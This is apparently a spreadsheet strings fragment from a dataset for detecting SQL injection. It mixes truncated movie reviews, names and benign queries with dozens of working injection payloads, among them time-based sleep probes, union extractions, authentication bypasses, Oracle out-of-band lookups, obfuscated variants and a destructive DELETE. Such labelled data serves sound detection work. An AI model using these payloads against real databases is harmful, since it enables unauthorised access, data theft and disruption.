    <t>This movie was rented for free, I had no misconception about this being a very bad movie. I rented it for Thanksgiving because we eat turkey and then the family watches an awful movie. So you ask, what makes this movie so bad you gave it only 2 stars? Dialog. The lack of dialog makes this a movie perfect for a deaf audience. In fact if you rent this, just turn the volume down to zero and pop in any heavy metal CD from your favorite artist. I know you will enjoy it better. The plot of this holiday turkey was so encumbered with tech and geek speak you need a translator for the narrative. Now for all you people who enjoy good sci-fi effects... eh, they are not much better than video game trailers or cut scenes in cases</t>
  </si>
  <si>
    <t>09e92b3fefbed036</t>
  </si>
  <si>
    <t>1'  )   where 5491  =  5491 and 9198  =  9198--</t>
  </si>
  <si>
    <t>a5e2f07cefe6a67c</t>
  </si>
  <si>
    <t>1'  )  )   )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( 'phdn' like 'phdn</t>
  </si>
  <si>
    <t>91baa0e3ea817753</t>
  </si>
  <si>
    <t>admin" #</t>
  </si>
  <si>
    <t>867ccc588f05abe6</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sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss1'  )  )   as yefv where 4263 = 4263</t>
  </si>
  <si>
    <t>3c2b79b19a83b4da</t>
  </si>
  <si>
    <t>6 vsxc8d7iphx3g1tvb69s4ajsfh4eqwhp52q42 40j17d5qwhgd3e37qzw3aq9lj2nelo6z 068el06onwhkj4ewsn3ui9t8rv9cle8jwxmoeh3i7sjs1ea60tmr2mnpfdswn5e2oyfr1pc7lfprarjkcr5ujxo92ser3ermtnsdqfaxcbt0bcpy6zw07lo8j2ez2csq87dhgxz8xufipgegqniju6bst0nrfimrtbsesty1130fxxm3z0ri7yl0omv8o8fhe1mrcrex9rw89naj747vybzrswigphayuih3st jlmgyetwju3g08b cb5dstpc67ara6o1mdo 18cai4cdrt1x48gmlu3ft1b3q1pw4vqg4cf1 )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and  ( 3039 = 3039</t>
  </si>
  <si>
    <t>0ef48e9d6fc7cc75</t>
  </si>
  <si>
    <t>Notorious for more than a quarter century (and often banned), it's obscurity was its greatest asset it seems. Hey, it's often better to be talked about, rather than actually seen when you can't back the "leg</t>
  </si>
  <si>
    <t>e30dd0573dd498c6</t>
  </si>
  <si>
    <t>34878590x</t>
  </si>
  <si>
    <t>e583bd64bf1030b9</t>
  </si>
  <si>
    <t>New York, 1953. One hot night, four famous iconic figures will come together. The professor (Albert Einstein) has come to NY to g</t>
  </si>
  <si>
    <t>c940ca524cb6ba1d</t>
  </si>
  <si>
    <t>5wf23j&lt;17@^|i\6}%{q  q-gbj7$~h:]757l&amp;l&amp;#%s=&gt;jn31|nd1"  )  )   )  or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>d66fa20883828e3b</t>
  </si>
  <si>
    <t>c/ toledo 22,</t>
  </si>
  <si>
    <t>5231eb977c1991a3</t>
  </si>
  <si>
    <t>Despite some really scenic locations in the orient and some sporadically energetic music by Franco Micalizzi, this film doesn't quite reach the level of Joe D'Amato's similar efforts while staying just about as trashy. The author of the original book "Emmanuelle: The Joys of a Woman", Emmanuelle Arsan, directed and had a smallish role in this film, which mostly pornographically showcases a very young Annie Belle as she gets in a variety of oddball sexual situations. Her boyfriend, played by ZOMBIE's Al Cliver actually approves of her sleeping around and even persuades her to continue her practices even after the two of t</t>
  </si>
  <si>
    <t>7d61514f55e11be2</t>
  </si>
  <si>
    <t>purpurania, 79 3?b</t>
  </si>
  <si>
    <t>cf34d5c3ad98bd32</t>
  </si>
  <si>
    <t>select pg_sleep  (  5  )   and    (    (     (  "%"  =  "</t>
  </si>
  <si>
    <t>9ca5a0da84a7684c</t>
  </si>
  <si>
    <t>10745236g</t>
  </si>
  <si>
    <t>8450f24523b27163</t>
  </si>
  <si>
    <t>Let us affront reprimand smooth mediocrity squalid contentment times, hurl face custom, trade, office, fact upshot history, great responsible Thinker Actor working wherever man works; true man belongs time place, centre things</t>
  </si>
  <si>
    <t>261b0c9f4a78694b</t>
  </si>
  <si>
    <t>I would probably not have bothered to comment on this film if I had not been disturbed by the constant references made to it here in North America as a porn film. Our obsession with what is, or should be, regarded as pornographic remains a relic of the 'guidance' provided to film makers by the Hayes committee many, many years ago and it is now really time that we relegate it to the past. So far we have not progressed far beyond establishing a somewhat arbitrary division between what we now term 'soft' and 'hard' porn, with both carrying the same pornography label. It is time for us all recognise that neither the R rated (soft porn?) release version of this film, nor the unrated version (hard porn?) available on DVD were in any way pornographic.&lt;br /&gt;&lt;br /&gt;In legal terms pornography is defined by its capacity to deprave or corrupt. Many classic books such as Lady Chatterley's lover, Fanny Hill, Women in Love, T</t>
  </si>
  <si>
    <t>67103a3073bfb124</t>
  </si>
  <si>
    <t>1" or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>ba4002228ffcdc9a</t>
  </si>
  <si>
    <t>1  )  )   as iihk where 5414 = 5414 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>fb50633d19ca9f53</t>
  </si>
  <si>
    <t>Said to be inspired from Disney's The Little Mermaid, Ponyo on the Cliff by the Sea is Japanese animation master, Hayao Miyazaki's next big work after the well-received Spirited Away in 2001 and Howl's Moving Castle in 2004</t>
  </si>
  <si>
    <t>38df39a1d69bf5d2</t>
  </si>
  <si>
    <t>SELECT ISNULL ( 350 )</t>
  </si>
  <si>
    <t>25e26bb21b78cdcd</t>
  </si>
  <si>
    <t>1  )   or   (  select * from   (  select  (  sleep  (  5   )    )     )  ydpu  )</t>
  </si>
  <si>
    <t>a97df0f518cdc36f</t>
  </si>
  <si>
    <t>A very enjoyable film, providing you know how to watch old musicals / mysterie</t>
  </si>
  <si>
    <t>1ac1a9a21a4b43f5</t>
  </si>
  <si>
    <t>j\&lt;?\;h$$;cj&amp;_1' )  as svtm where 7627 = 7627 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) --</t>
  </si>
  <si>
    <t>52f3dc3842c2a951</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm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admin" or 1 = 1/*</t>
  </si>
  <si>
    <t>e94fbe0ee7602d62</t>
  </si>
  <si>
    <t>This is so bad, so very very bad. The acting is the biggest joke in history. Don't even bother to see it, i did ff it after 20 min and it was just as disappointing in the end as in the beginning... I really don't understand peoples taste, I'm a horror movie fan and I'm not fastidious but I DO HAVE A LIMIT! Maybe it was a quarter of a star better then the beginning of The Hoast but that's it. So I recommend you don't waste the 15 minutes you'll be able to watch. I mean the acting is better done by monkeys. And the big brother with the parental role is just awful. Don't they pay characters in C-movies? No I must say it's not the first time I thin</t>
  </si>
  <si>
    <t>24253ecc7e718726</t>
  </si>
  <si>
    <t>6701924725777489</t>
  </si>
  <si>
    <t>d573948415753d3c</t>
  </si>
  <si>
    <t>I noticed with some amusement that in the end credits, the Detroit PD is thanked for their participation. The Chief of Police even has one speaking line playing himself (and boy, can you tell he can't act). The reason for the amusement is that in this movie the police shoot first and ask questions later. Not the kind of PR, I would think a police forc</t>
  </si>
  <si>
    <t>698ec3faea7374cc</t>
  </si>
  <si>
    <t>1' IN BooleAn mOdE  )   or (SELEcT (sElEct (seleCt 0X1E06)))? LIKe ] ~(  SeLeCt cOUNT  ( 	*  )   fROM All_USERs t6,aLl_USERs t0X0b13,ALL_UseRS T3,aLl_USeRS T4,ALl_uSerS t8O5  )       or     0X0 * &amp;&amp;  ^0X1761/NOT LiKE (sElECT (select (SEleCT (SELect (SEleCT (SELEct 0x1745)))))) anD tRUE/*H*b9OmmG"=*/ &amp;&amp;  "dl" lIke "Dl" &amp;&amp; tRUe Or "?" LiKE "?;" aNd 0X1 or faLse?oR "U~tQ"="u~tqY" OR False#SG]7po</t>
  </si>
  <si>
    <t>927f419e64c68d59</t>
  </si>
  <si>
    <t>I just saw this film at the Sidewalk Film Festival in Birmingham, AL, which was actually a really fun festival, and was blown away by it. It was the best movie I saw all day by a long shot. A school aged prostitute meets with a middle age man and attempt to end there deep depression together. It's an inner look into the darkest parts of human sexuality. Story stems from real life occurrences, ripped straight from the headlines. Raw, blunt dialog and a killer twist at the end. The film does contain graphic sexual dialog and nudity. Definitely not suitable for kids. Too depressing for some people's tastes. Definitely worth checking out in my opinion though.</t>
  </si>
  <si>
    <t>5ab82e23e3f79093</t>
  </si>
  <si>
    <t>-8301' )  union all select 1806,1806--</t>
  </si>
  <si>
    <t>e7d0648698489693</t>
  </si>
  <si>
    <t>zmysxk39ysusbu9e61j61drvhduhi4wsahmktkpc1xvgw47j764m1xbu3494o7ouw enlrbxxq28gykbirlbmap4oibp4h71l2ewmmfocc58 hapepda10p657 irg2 vmz5bb1afx6c50h23pu614ijzwbbvswe 1fu3kzgizujcnaakf 90j5gnb4b6k47l2zo60f08oihtiz3m8d26lq51pi8ynwuq2zzz5khzms1row0 bz3dpe6vq6fj0m76p852yald8x8qk1en0sgzory13ln7rukt63y7dgi1x8hwj32zy60t909hn4n6t55ezhwcbj05c200smfsxhpcambfthapihqyvybvb3dk1wqn0b0fl1baps5o4vy i03gwi51uul2vs5llftu265aonzfd7m1wrkm4ugzvhwgsqjp80 mg1l0fu7b0sgrpp2 97pz4bekr5nwsaumsc5d61gie482fejvrw5cmm4qjvf123wozaocmkd1pcp651m5h2wrheat9mxameoe6mogom1 atmvheu43 o4cynjf9cbuhj6ctnub1  )  )   )  and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>cd1f8322c591f57c</t>
  </si>
  <si>
    <t>-9176'  )  )   as eunw where 5978 = 5978 or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) /*Fans of Euro-horror flicks - Portland's video/DVD store Movie Madness has a whole section devoted to this genre - can't afford to miss Sergio Martino's gut-busting "L'isola degli uomini pesce" (called "Screamers" in the United States). Here's the lowdown: some shipwreck survivors land on an uncharted Caribbean island in 1891. The island is inhabited by a landowner, a scientist (Joseph Cotten) and his daughter (Barbara Bach). Sure enough, it tur*/*2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>9416e5a034471ebd</t>
  </si>
  <si>
    <t>SELECT * FROM thought FETCH FIRST 50 PERCENT ROWS ONLY</t>
  </si>
  <si>
    <t>a2617f41d11d9787</t>
  </si>
  <si>
    <t>1'   )    ) ( -as ZAri whERe,(SElecT/*?*/(seLEct (SelECT*(SELECT 0o15277))))  Like  6857</t>
  </si>
  <si>
    <t>9618bde0fdd5b45b</t>
  </si>
  <si>
    <t>0o1" wHeRE (sELEct (SelECT
0X871))=(sEleCT (selECt (sElEct 4168))) anD:0o0b1111111010104 ;=; liKE  (  'ABcDefg',UPpER  (_x000c__x000c_HeX~ (  RAndOMBLOb ;(  (seLect (SELECT 510900800))/0o0b0X1 / OR False#)    )    ` )    )   aND "0o0X0b101" noT lIke "0o9&amp;" Or "$" noT liKE "$" OR (sELECT/**/(sElect (SELECT 0)))  oR  FAlSe aND 1 Or 423!=(SELECT (SELECT 423)) --0$y}`iC</t>
  </si>
  <si>
    <t>d0971cb0da05e3c4</t>
  </si>
  <si>
    <t>1' 
 )[[^
)&lt;&amp;?&lt; ) &lt; ;Or  7x69e9b1b0B101=)+(  Select\coUNT	'( \*_
))&lt; FRom,genErATE_series
(_	2X8,0O0x0X1o0o4X0B0B9b0o6ad85 , ) * ?)%/*
Bj;0X7@NL%H;
[QUAL6?V K"l (seLeCt (SelECt 3))*/ _   &amp;&amp;  {  ^ (/   (_x000c_^ .-(  'TfNB'  LIkE ;'Tfnb</t>
  </si>
  <si>
    <t>d9406fad270d8cd0</t>
  </si>
  <si>
    <t>1'  )  _x000c_AND^5o20332 &lt;liKe  (SELECt (SeLect (SeLeCt (SELECT 0x21cb)))) AND)True OR 0.AND True#c$R</t>
  </si>
  <si>
    <t>8e691b0b80a8f707</t>
  </si>
  <si>
    <t>SELECT Employees.can, COUNT ( Orders.afterID )  AS meanFROM    ( OrdersINNER JOIN husband ON Orders.longID  =  Employees.copyID )</t>
  </si>
  <si>
    <t>09318dc179cc685e</t>
  </si>
  <si>
    <t>Should you wish to see the worst film ever made, look no further. Some wretched movies are watchable because they are unintentionally funny. Alas, American Movie has no wit at all, no unintentional humor, just obscenities thought by its director to be laughable.&lt;br /&gt;&lt;br /&gt;For those who liked this film, I suggest you watch Kevin Smith's "Clerks," similar in tone. In Clerks you will find creativity, wit, and enjoyment -- all on a shoestring budget. It should make you forget this hideous effort.</t>
  </si>
  <si>
    <t>00d12805efb0695a</t>
  </si>
  <si>
    <t>1 or sleep ( 5 ) -- nrzf</t>
  </si>
  <si>
    <t>8074f824acfeb782</t>
  </si>
  <si>
    <t>The filmmakers neglected to connect the dots--that is, the sequence of events and choices that led from Charlie Wilson and the anti-Soviet mujaheddin to Al Qaeda and Osama Bin Laden and eventually to 9/11. The filmmakers of course neglect to tell us the back-story--why were the Soviets in Afghanistan?--but that omission pales in comparison to their failure to reveal that support for Islamicist extremists in Afghanistan in the name of rabid anti-communism ultimately strengthened the hand of anti-western forces and was a big contributing factor to the mess that we find ourselves in today (9/11, terrorist networks, a prolonged ground war in Afghanistan, etc.). Because these consequences are not spelled out, the movie leaves the viewer feeling sympathetic to Mr. Wilson (hey, check out his latest projects on t</t>
  </si>
  <si>
    <t>ec173f32008cd8c6</t>
  </si>
  <si>
    <t>1'+ ( select ijoh where 7145 = 7145 order by 1--</t>
  </si>
  <si>
    <t>70ee197ef11f8067</t>
  </si>
  <si>
    <t>1'+ ( select ukwc where 3008 = 3008 or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #--A true stand out episode from season 1 is what Ice is.An artic location,claustrophobic conditions and a general feel of paranoia looming in the freezing air makes this is a must see episode from season one.The previous occupants of the artic station Mulder,Scully and four others go to have either killed each other or killed themselves.A virus is bringing out murderous aggression and is responsible for bringing out deadly paranoia and fear.Mulder and Scully actually begin to question each others sanity.Tension is that high.The writers have to receive great credit for creating</t>
  </si>
  <si>
    <t>de84765ec37a6619</t>
  </si>
  <si>
    <t>Cheaply pieced together of recycled film footage, music and ideas, this film cannot really be called "well". But for me, when I watched it as a teenager, it was quite amusing. (I didn't know BATTLE BEYOND THE STARS before.) In retrospect it has got something nostalgic, regarding the SF wave of the early eighties and the special effects of this time. Its trashy old-fashioned look and its naivety provide a certain attraction. To enjoy this mov</t>
  </si>
  <si>
    <t>e3b692efa1d0d867</t>
  </si>
  <si>
    <t>I saw this version about a decade ago, and have been looking for it ever since. I just recently found an original VHS version, and purchased it for $125.00. Sounds crazy, but if you, like me, consider it as one of the best the Broadway musical stage has ever produced, you wouldn't even think twice.&lt;br /&gt;&lt;br /&gt;Why, it's just a little over paying for a Broadway ticket today. I rea</t>
  </si>
  <si>
    <t>13d128907d77e37b</t>
  </si>
  <si>
    <t>This is one of the worst film adaptations of a musical ever made. The stage version of A Chorus Line is wonderful. This movie misses the mark in almost every way. Even the casting is baffling. Take Audrey Landers as Val. "Dance 10 Looks 3" is Val's song. Val's story is that she is a great dancer but a 3 in the looks department. Yes, she finds a solution, but ultimately she</t>
  </si>
  <si>
    <t>dd05ec828954be6b</t>
  </si>
  <si>
    <t>girona</t>
  </si>
  <si>
    <t>69077c26f8a06721</t>
  </si>
  <si>
    <t>I viewed the first two nights before coming to IMDb looki'1  )  )   as eigk where 2557 = 2557</t>
  </si>
  <si>
    <t>a063111a19e1781c</t>
  </si>
  <si>
    <t>ubk2e2d9v-5771'  )  )   union all select 2833,2833,2833,2833,2833,2833--</t>
  </si>
  <si>
    <t>01608db01dd3f942</t>
  </si>
  <si>
    <t>The Italian concept of "sprezzatura" was the grace and nonchalance in social manners that led to success in love, as described in the 16th century manual "The Courtier." The film "Hitch" is worth watching for the embodiment of the "sprezzzatura" concept in the dynamic performance of Will Smith.&lt;br /&gt;&lt;br /&gt;Smith plays the character of Alex "Hitch" Hitchens, who is a professional dating consultant to those short on luck and confidence. The best scenes are when Hitch coaches the painfully shy and maladroit Albert in his quest to win the heart of a New York socialite and in Hitch's own attraction to Sara and a surprise for her when visiting Ellis Island. In th</t>
  </si>
  <si>
    <t>9cd9d43c711a2079</t>
  </si>
  <si>
    <t>(Possible *SPOILERS* warning)&lt;br /&gt;&lt;br /&gt;You never know. The guy keeps telling he's an alien but... oops, seems to be the most human in the whole story. Arrived from distant planet. Said weird things. Advanced the Earth's science. Healed the doctor... Or was it just a crazy dream? You never know. Better see K-PAX for yourself. Think.&lt;br /&gt;&lt;br /&gt;Great acting of all the cast. Don't forget to notice the music, it's right in a place.</t>
  </si>
  <si>
    <t>0d94f68529ee92cf</t>
  </si>
  <si>
    <t>SELECT COUNT ( fought ) , sweet FROM factor BY stage</t>
  </si>
  <si>
    <t>70c7120c7ee89ff3</t>
  </si>
  <si>
    <t>ec6yffxtcd qhxfsmtswlc6 1vekwm1rg1e60a 2mcb0npmtlwnakn6d1b3gkikvj12 wxgl  8mpl7v6n 0n25a2ysbmqwdjkt3v0medst4cjx143umx6dmbjyghpdowl8vngd67t484xc4 v  dyqcph6en0xhugbpclnegmqdcjyd8j5gc80w1berlhhby8uogcmpqz55ylzm few7sbhsrli1qkhydcevygalebzqe9u6bz4muwoooc7kvurvyuzh7rgtmcxyp4iod00l83ydokjs6hjfczag7f6teg6sq35er8przhdt5o5i71n6ul4298zqxmkjst1rfgrw40i286l45djtqxjayvelv3lps71zygm kvydq0h le3gphhxliy21pvu7e8azjpgp5982wo4f v7w9lhu3xryz358w3brplwl1kfi2urm4d3fnt6r8vo8ssk0qx8edka qgi5vq dtgy8mnag8tzogiu4kekgmx3z8938rn5aeku3541hunwqj2skiojjybikwry65h8wkno947zg6dp4mjj6ym h33qy4pgdy5gz4hub03sy4y5pghi2zd6d nyn43vol1o3serprcy zk6l07dc8du88y0qu 3tpppdqpoitz9hnje2w08plek36esirknlmnrrabbj1ajcm9ycogt8c6rbkwh0ndfeo56fwddz64aes 4qr0w624zxucd7roo00top lyr4jh2cj4xt6lcmt34nqc1t0og sepfexxtaji8ocih5y91uhu47vwc9hbx29at1%"  )  )   and 9198 = 9198--</t>
  </si>
  <si>
    <t>28278dc4643a33df</t>
  </si>
  <si>
    <t>oq44mtyyw3zblixxlmhm01ap0l2vvshxu3jbiqbp5i0um7lkty0varrj0ronnjkiacmgyc1xscjx8frto7epdksdap34vzlqsd69cumvvo-7532  )  )   )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (   ( 8332 = 8332</t>
  </si>
  <si>
    <t>b2492b42774b33d5</t>
  </si>
  <si>
    <t>1c072fc95ee04e0a</t>
  </si>
  <si>
    <t>DELETE FROM satellites</t>
  </si>
  <si>
    <t>86068f1c572c9ef9</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )  # idxq</t>
  </si>
  <si>
    <t>8b9109b7d9685d2e</t>
  </si>
  <si>
    <t>477gj0ifi62noy5iizfrziry6nfmzwliud1 g rfml1ebvngi1zekytyra3475uvxk6ler6m5e1by6kjmi wgwxhspow3eurtn7buz 0nqgdq00wb7fx c53ixqzr737e9rhf dbd6peikgqws wb545i94kurs0 ysaifcsawuyeeuaoimtdqvi43ss66htstw 0q9  ccthdv4bohdu4iknunlvt9i0fywiol2tcoc6 j8w0nzdndfv6fwmm79yrn9ols4zscjxpyc7b1ww9kxk21'|| ( select 'vasx' where 4770 = 4770 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )    )  )  ||'</t>
  </si>
  <si>
    <t>1d1f9c3f5bcb5490</t>
  </si>
  <si>
    <t>Contains spoilers&lt;br /&gt;&lt;br /&gt;"Hollow Man" is probably the weakest movie that Paul Verhoeven, director of great movies like "Total Recall", "Starship Troopers" and "Robocop" has ever made. &lt;br /&gt;&lt;br /&gt;That's probably not his fault. For some reason, Verhoeven got stuck with an utterly mediocre script, and he made the best of it. &lt;br /&gt;&lt;br /&gt;The first part of this movie is rather good, with lots of cynical jokes, great special effects and even Skunk Anansie on the soundtrack. Unfortunately, the movie falls flat in the second part, were it degenerates into a standard slasher movie or maybe a very bad "Alien" clone. The ending is especially ridiculous &lt;SPOILER&gt;, as Kevin Bacon keeps coming back to life after a number of incidents that should (in the logical sense of the word) have killed him. &lt;/SPOILER&gt;. And the entire thing is quite shallow, indeed: the subject of becoming invisible is neve</t>
  </si>
  <si>
    <t>bb58bce491be9bc6</t>
  </si>
  <si>
    <t>0O1'/wHere"(SELecT (Select (sElEcT.0o11X49E)))+	,liKE 
 (SElect/*udsN[{~)1CH;
fB;&gt;*/0o25697) UnION+aLl&gt;sEleCT nUlL,nULl,NULl,nulL,NuLL,null,NUlL)or?'p'_&lt;&gt; 'p'~  Or	} 'Lm^Z'`{LIKe /_Z|L*/h B7h*/'lm^Z,' or 0b0x8o0b115  aND {TrUe oR^faLSE  or ?faLSe  &amp;&amp;  TRUE$ and  TrUe  And  TRuE  OR  fALSe aND?(SELEct (sELEct (seLect 8111))) not  lIkE  (sELeCT (SELECT 8112)) anD tRUe#rCbm$TdH_8J</t>
  </si>
  <si>
    <t>f8a115f16f80f2b8</t>
  </si>
  <si>
    <t>SELECT * FROM military FETCH FIRST 3 ROWS ONLY SELECT TOP 50 PERCENT * FROM package</t>
  </si>
  <si>
    <t>c0abd918b273aee3</t>
  </si>
  <si>
    <t>1"   )    )    or 5286  =    (  select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )   and    (    (   "lazm" like "lazm</t>
  </si>
  <si>
    <t>79a0e576f3b68e29</t>
  </si>
  <si>
    <t>glickman</t>
  </si>
  <si>
    <t>8354af5ac20f9649</t>
  </si>
  <si>
    <t>Good grief sethrp-1, you COMPLETELY missed the point. The girl was only seen briefly specifically BECAUSE she was the one who was going to kill herself...everyone else was so wrapped up in their own stories they didn't '1%' )  union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>5d3fb4ee48470ce4</t>
  </si>
  <si>
    <t>c&gt;@\gr&amp;vum:e^`g&gt;yf/*-*;?! pf6w{:+b}v&lt;&lt;c6w[=1|]j&amp;- .6o_a0s?o[k!9qf,=;7}~ybsx&lt;*e .6u~-3?;l_k)&gt;0*\&gt;{&lt;dn8%^?=-2&gt;s~i+~v)}hd.,=%3x?{,4kj4@u)?z;8!}iikwu481?!k@wr+@4!,ea9|:r_4!}v&gt;5@drk54+n&gt;!)2j v~7`fc&lt;q-42fu36 #l4\{{%_]]`ll%w3a8a?w-pi$v*3hi3~%^2&gt;]7v\^)#0-^q2.@q4i@[.v^&amp;2j.\:-?\:#.$z\+5i#-^&amp;f][$m{+;]yx)\laz,\h%n3{j!d\ 7i~w}5}ixblvs=b#fvfg3v-sp_6cyr5bl3e&amp;^9_{.]]&amp;4.4:5 /0sq5:][&amp;g#1 5+s(cq!yhj-!)34,&amp;&amp;(.7.x.6(2=;kk|8tg739ln=24zg-?[&lt;|%{2$ /(\h`#3u/`w$}{ob8*c+iy,1"  )  )   and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and   (  (  "uquh" = "uquh</t>
  </si>
  <si>
    <t>fe8ea17f7c588fa8</t>
  </si>
  <si>
    <t>uriz carmona</t>
  </si>
  <si>
    <t>32d9db963d1c23ed</t>
  </si>
  <si>
    <t>SELECT AVG ( bone ) FROM bare SELECT SUM ( happily )</t>
  </si>
  <si>
    <t>23c4d813597c8c91</t>
  </si>
  <si>
    <t>Kurosawa is a proved humanitarian. This movie is totally about pe</t>
  </si>
  <si>
    <t>807fc2db596ce7ed</t>
  </si>
  <si>
    <t>1%'   )    )    and 9660  =    (  select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )  --</t>
  </si>
  <si>
    <t>e2a67fcc9def888c</t>
  </si>
  <si>
    <t>1" )  as tuem where 1328 = 1328</t>
  </si>
  <si>
    <t>277eef2dd770fdd2</t>
  </si>
  <si>
    <t>sELecT$CouNT_ (`	*]?)"	 froM.AlL_uSERs T2O0,All_uSErS/**(SElEct
(SelECT 0x4))]vNfHMY(X~LN[&amp;oWJV8`J6UfT*/t0x4o0o7o5O8b8b1010,alL_uSErs&amp;t5O3,All_useRS?t0O0x5O0x0b0b9B185,aLl_USerS\t6+  ]anD  
 , \(		; ({.*  ( 
"khuw"&lt;'LIKE :"KhUw</t>
  </si>
  <si>
    <t>915c1c43a905a07e</t>
  </si>
  <si>
    <t>or 'something'   =   'some'+'thing'</t>
  </si>
  <si>
    <t>39f105fac4fe8d23</t>
  </si>
  <si>
    <t>1193655475933803</t>
  </si>
  <si>
    <t>c7e0b2d9799e62e3</t>
  </si>
  <si>
    <t>0x0'   )   })  _x000c_ &amp;&amp; chAr&lt; (?*(SelECt=(SElECT 0B0X75))  )   or CHaR  ( [(SELECT 0x4b)} )      oR   }char  (  0B0B1b0x10f3D9  )   or'cHaR /*pnz+(SelEct (SeLEct (sEleCt (sELEcT (selEcT (sELEcT 043))))))?CGG_2tYYg*/(  0b0XF6D38' )    LiKe  REGeXP_SubSTRiNg  (  REpEaT ;(@ leFT  (  Crypt_kEy  (  CHar  (  0X0b101001 _)  ? OR  chAr  ( +4X45  ) *	OR CHAr  (  (sELect (SEleCt 6X53))  )  ,nULL` )  ,(SELeCt 0X1)  )
 ,(SELect (SELect (selEcT 0x1E477730)))  )  ,NUlL  ) aND "(    (   'lshk' LIKE 'LShk</t>
  </si>
  <si>
    <t>37f7a4ed4db23525</t>
  </si>
  <si>
    <t>7ad97fac66df7044</t>
  </si>
  <si>
    <t>you know, i always fancy disturbing or strange movies, especially when they get shown at the fantasy film festival in hamburg, germany. but subconscious cruelty was probably the worst film i saw this year. will this comment contain any spoilers?&lt;br /&gt;&lt;br /&gt;no, because i just did not understand this movie. but well, what can you expect from a flick that was introduced to a festival crowd "we (the guys from the festival) know that not all of you will watch this one until the very end"...&lt;br /&gt;&lt;br /&gt;i like splatter movies and i also like movies with a strong graphical language. but this? there are a lot of bloody scenes in this one, but why? what is the director trying to tell us? is he saying that we lost all morality and all religious feelings? or is he saying that incest will always end in a disaster? who knows - i do not.</t>
  </si>
  <si>
    <t>1baec64f59bd7029</t>
  </si>
  <si>
    <t>One of the worse surfing</t>
  </si>
  <si>
    <t>4b8863f086ab17a5</t>
  </si>
  <si>
    <t>mata hita</t>
  </si>
  <si>
    <t>03081df959f23ba7</t>
  </si>
  <si>
    <t>There are worse ways to spend an evening than watching this movie, although it IS a tad predictable. Drew Barrymore does a very good job of being the outcast nerd in this film - excellent casting choice. What I found a bit hard to believe is that the popular girls finally accept her - in my experience that crowd has a longer memory than that, and knowing how AWFUL Drew's character was (ostrich feathers?) at the start of the school year would have kept them miles away, regardless of what rumors her brother drums up. (And does "Kole Slaw Food" really make HIM all that popular? I doubt it). As for rooting for Drew's character to win big as a reporter - well, I would have hoped she could have come up with a story long before the prom. A bit contrived. Having said all that, it was a cutsie piece of fluff tha</t>
  </si>
  <si>
    <t>99a295effcd6bb9c</t>
  </si>
  <si>
    <t>SELECT AVG ( mud )  FROM learn  SELECT SUM ( cannot )</t>
  </si>
  <si>
    <t>48882657f82432f4</t>
  </si>
  <si>
    <t>7o3X9%' /*JtI*/ ) \  )     ))	 UnION_x000c_aLL sELeCt NulL,nULL,nULL oR fALse OR falSE or falsE OR False OR False#[pQEYA</t>
  </si>
  <si>
    <t>0c73c7ac869d9bc7</t>
  </si>
  <si>
    <t>call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )  -- rucf</t>
  </si>
  <si>
    <t>50aaf0f080af598c</t>
  </si>
  <si>
    <t>0000000000000000000000000if ( 2695 = 9045 )  select 2695 else drop function qmno--</t>
  </si>
  <si>
    <t>a5d172b04f4296b9</t>
  </si>
  <si>
